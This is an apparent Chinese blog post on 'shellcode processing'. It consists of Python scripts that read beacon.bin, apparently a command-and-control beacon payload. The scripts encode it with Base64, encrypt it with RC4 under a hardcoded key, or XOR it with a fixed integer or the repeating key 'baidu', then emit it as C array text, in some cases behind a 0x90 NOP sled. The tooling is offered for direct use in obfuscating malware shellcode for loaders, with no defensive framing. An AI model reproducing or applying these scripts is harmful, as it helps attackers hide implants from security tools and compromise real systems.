shellcode处理

C语言数组处理

def read_binary_file(filename):
    """Return the full contents of *filename* as bytes.

    The file is opened in binary mode, so the bytes are returned exactly as
    stored, with no newline or encoding translation.
    """
    with open(filename, "rb") as handle:
        contents = handle.read()
    return contents


def generate_c_array(data):
    """Format *data* as the text of a C brace initializer.

    Each byte becomes an upper-case, zero-padded ``0xNN`` literal, and a
    newline plus a tab is emitted before every 100th byte.  The result
    always begins with the same eight ``0x90`` literals, placed ahead of the
    first byte of *data*, so every generated initializer shares that
    constant prefix.
    """
    prefix = "\t0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,"
    pieces = []
    for index, value in enumerate(data):
        if index % 100 == 0:
            pieces.append("\n\t")
        pieces.append(f"0x{value:02X}, ")
    # Drop the comma and space that follow the final literal.
    body = "".join(pieces).rstrip(", ")
    return "{" + prefix + body + "\n};"


def main():
    """Render the bytes of ``beacon.bin`` as C array text in ``base_res.txt``."""
    # Load the raw input bytes.
    source_path = "beacon.bin"
    raw_bytes = read_binary_file(source_path)

    # Render them as a C-style array.
    array_text = generate_c_array(raw_bytes)

    # Save the generated text.
    target_path = "base_res.txt"
    with open(target_path, "w") as out:
        out.write(array_text)


if __name__ == "__main__":
    main()

base64编码

import base64

def read_binary_file(filename):
    """Read *filename* in binary mode and return everything in it as bytes."""
    with open(filename, "rb") as source:
        payload = source.read()
    return payload

def base64_encode(data):
    """Return the standard Base64 encoding of *data* as a ``str``.

    Base64 is an encoding, not encryption: ``base64.b64decode`` restores the
    original bytes without any key.
    """
    return base64.b64encode(data).decode("utf-8")

def generate_c_array(data):
    """Format the characters of the string *data* as a C brace initializer.

    Each character is written as the upper-case, zero-padded ``0xNN`` value
    of its code point, with a newline and a tab before every 100th
    character.
    """
    literals = (
        ("\n\t" if pos % 100 == 0 else "") + f"0x{ord(symbol):02X}, "
        for pos, symbol in enumerate(data)
    )
    # Drop the comma and space that follow the final literal.
    body = "".join(literals).rstrip(", ")
    return "{" + body + "\n};"

def main():
    """Base64-encode ``beacon.bin`` and save it as C array text.

    The output goes to ``base64_res.txt``.
    """
    # Load the raw input bytes.
    source_path = "beacon.bin"
    raw_bytes = read_binary_file(source_path)
    # Base64-encode them; the result is a str.
    encoded_text = base64_encode(raw_bytes)
    # Render the encoded characters as a C-style array.
    array_text = generate_c_array(encoded_text)
    # Save the generated text.
    target_path = "base64_res.txt"
    with open(target_path, "w") as out:
        out.write(array_text)


if __name__ == "__main__":
    main()

RC4加密

from Crypto.Cipher import ARC4


def encrypt_rc4(key, data):
    """Run *data* through an ``ARC4`` cipher object created from *key*.

    RC4 is a symmetric stream cipher, so passing the returned bytes through
    a fresh cipher built from the same key yields the original *data* again.
    """
    return ARC4.new(key).encrypt(data)


def generate_c_array(data):
    """Format *data* as the text of a C brace initializer.

    Values are written with ``hex()``, so they are lower-case and not
    zero-padded.  A newline and a tab are emitted before every 100th value
    except the first, and the ``", "`` after the final value is kept.
    """
    pieces = ["{\t"]
    for index, value in enumerate(data):
        # Start a new tab-indented row at each multiple of 100, index 0 excluded.
        if index and index % 100 == 0:
            pieces.append("\n\t")
        pieces.append(hex(value) + ", ")
    pieces.append("\n};")
    return "".join(pieces)


def write_to_file(filename, content):
    """Write the string *content* to *filename*, replacing any existing file."""
    with open(filename, "w") as sink:
        sink.write(content)


# Read the input file at module level: main() below uses the module-level
# ``beacon_data``, and loading this module fails if beacon.bin is missing.
file = open("beacon.bin", "rb")
try:
    beacon_data = file.read()
finally:
    file.close()


def main():
    """RC4-process the module-level ``beacon_data`` and save it as C array text.

    The key is the literal ``b"YourKey"`` and the output goes to
    ``base_rc4_res.txt``.
    """
    # RC4 with a key embedded in the script.
    rc4_key = b"YourKey"
    ciphertext = encrypt_rc4(rc4_key, beacon_data)

    # Render the result as a C-style array.
    array_text = generate_c_array(ciphertext)

    # Save the generated text.
    write_to_file("base_rc4_res.txt", array_text)


if __name__ == "__main__":
    main()

base64+rc4

from Crypto.Cipher import ARC4
import base64


def read_binary_file(filename):
    """Return the bytes stored in *filename*, read in binary mode."""
    with open(filename, "rb") as stream:
        blob = stream.read()
    return blob


def encrypt_rc4(key, data):
    """Return *data* processed by an ``ARC4`` cipher object built from *key*.

    The operation is symmetric: the same key applied to the output gives
    back the input bytes.
    """
    rc4 = ARC4.new(key)
    return rc4.encrypt(data)


def base64_encode(data):
    """Encode *data* with standard Base64 and return the result as a ``str``."""
    raw = base64.b64encode(data)
    text = raw.decode("utf-8")
    return text


def generate_c_array(data):
    """Format the characters of the string *data* as a C brace initializer.

    Every character is emitted as the upper-case, zero-padded ``0xNN`` value
    of its code point; a newline and a tab precede every 100th character.
    """
    pieces = []
    for index, symbol in enumerate(data):
        if index % 100 == 0:
            pieces.append("\n\t")
        pieces.append("0x{:02X}, ".format(ord(symbol)))
    # Drop the comma and space that follow the final literal.
    body = "".join(pieces).rstrip(", ")
    return "{" + body + "\n};"


def main():
    """RC4-process ``beacon.bin``, Base64-encode it and save it as C array text.

    The key is the literal ``b"YourKey"`` and the output goes to
    ``base64_rc4_res.txt``.
    """
    source_path = "beacon.bin"
    raw_bytes = read_binary_file(source_path)

    # RC4 with a key embedded in the script.
    rc4_key = b"YourKey"
    ciphertext = encrypt_rc4(rc4_key, raw_bytes)

    # Base64-encode the RC4 output, then render the characters as a C array.
    encoded_text = base64_encode(ciphertext)
    array_text = generate_c_array(encoded_text)

    # Save the generated text.
    target_path = "base64_rc4_res.txt"
    with open(target_path, "w") as out:
        out.write(array_text)


if __name__ == '__main__':
    main()

xor加密

数字型异或

def read_binary_file(filename):
    """Open *filename* in binary mode and return its whole contents as bytes."""
    with open(filename, "rb") as reader:
        data = reader.read()
    return data


def xor_data(data, key):
    """Return *data* with every byte XORed against the single integer *key*.

    The same key value is applied to every byte, and applying the function
    twice with the same key returns the original bytes.
    """
    masked = [value ^ key for value in data]
    return bytes(masked)


def generate_c_array(data):
    """Format *data* as the text of a C brace initializer.

    Bytes are written as upper-case, zero-padded ``0xNN`` literals with a
    newline and a tab before every 100th byte.  Eight ``0x90`` literals are
    always emitted first, ahead of the first byte of *data*, so the output
    starts with the same constant prefix on every run.
    """
    prefix = "\t0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,"
    literals = (
        ("\n\t" if pos % 100 == 0 else "") + "0x%02X, " % value
        for pos, value in enumerate(data)
    )
    # Drop the comma and space that follow the final literal.
    body = "".join(literals).rstrip(", ")
    return "{" + prefix + body + "\n};"


def main():
    """XOR ``beacon.bin`` with the integer 77 and save it as C array text.

    The output goes to ``xor_int_res.txt``.
    """
    # Load the raw input bytes.
    source_path = "beacon.bin"
    raw_bytes = read_binary_file(source_path)

    # XOR every byte with one fixed integer key.
    single_byte_key = 77
    masked_bytes = xor_data(raw_bytes, single_byte_key)

    # Render the result as a C-style array.
    array_text = generate_c_array(masked_bytes)

    # Save the generated text.
    target_path = "xor_int_res.txt"
    with open(target_path, "w") as out:
        out.write(array_text)


if __name__ == "__main__":
    main()

字符型异或

def read_binary_file(filename):
    """Return every byte of *filename*, opened in binary mode."""
    with open(filename, "rb") as infile:
        everything = infile.read()
    return everything

def xor_data(data, key):
    """Return *data* XORed with the byte string *key*, repeated as needed.

    Byte ``i`` of the input is combined with ``key[i % len(key)]``, so the
    key cycles with a period of ``len(key)``.  Applying the function twice
    with the same key returns the original bytes.
    """
    period = len(key)
    masked = bytearray()
    for position, value in enumerate(data):
        masked.append(value ^ key[position % period])
    return bytes(masked)

def generate_c_array(data):
    """Format *data* as the text of a C brace initializer.

    Each byte is written as an upper-case, zero-padded ``0xNN`` literal, and
    a newline plus a tab is emitted before every 100th byte.
    """
    pieces = []
    for index, value in enumerate(data):
        if index % 100 == 0:
            pieces.append("\n\t")
        pieces.append(f"0x{value:02X}, ")
    # Drop the comma and space that follow the final literal.
    body = "".join(pieces).rstrip(", ")
    return "{" + body + "\n};"

def main():
    """XOR ``beacon.bin`` with the repeating key ``"baidu"`` and save C array text.

    The output goes to ``xor_str_res.txt``.
    """
    # Load the raw input bytes.
    source_path = "beacon.bin"
    raw_bytes = read_binary_file(source_path)

    # XOR with a repeating multi-byte key; the str is encoded to bytes first.
    text_key = "baidu"
    masked_bytes = xor_data(raw_bytes, text_key.encode())

    # Render the result as a C-style array.
    array_text = generate_c_array(masked_bytes)

    # Save the generated text.
    target_path = "xor_str_res.txt"
    with open(target_path, "w") as out:
        out.write(array_text)


if __name__ == "__main__":
    main()

shellcode处理
http://xiaowu5.cn/2025/12/15/shellcode处理/
作者
5
发布于
2025年12月15日
许可协议
BY XIAOWU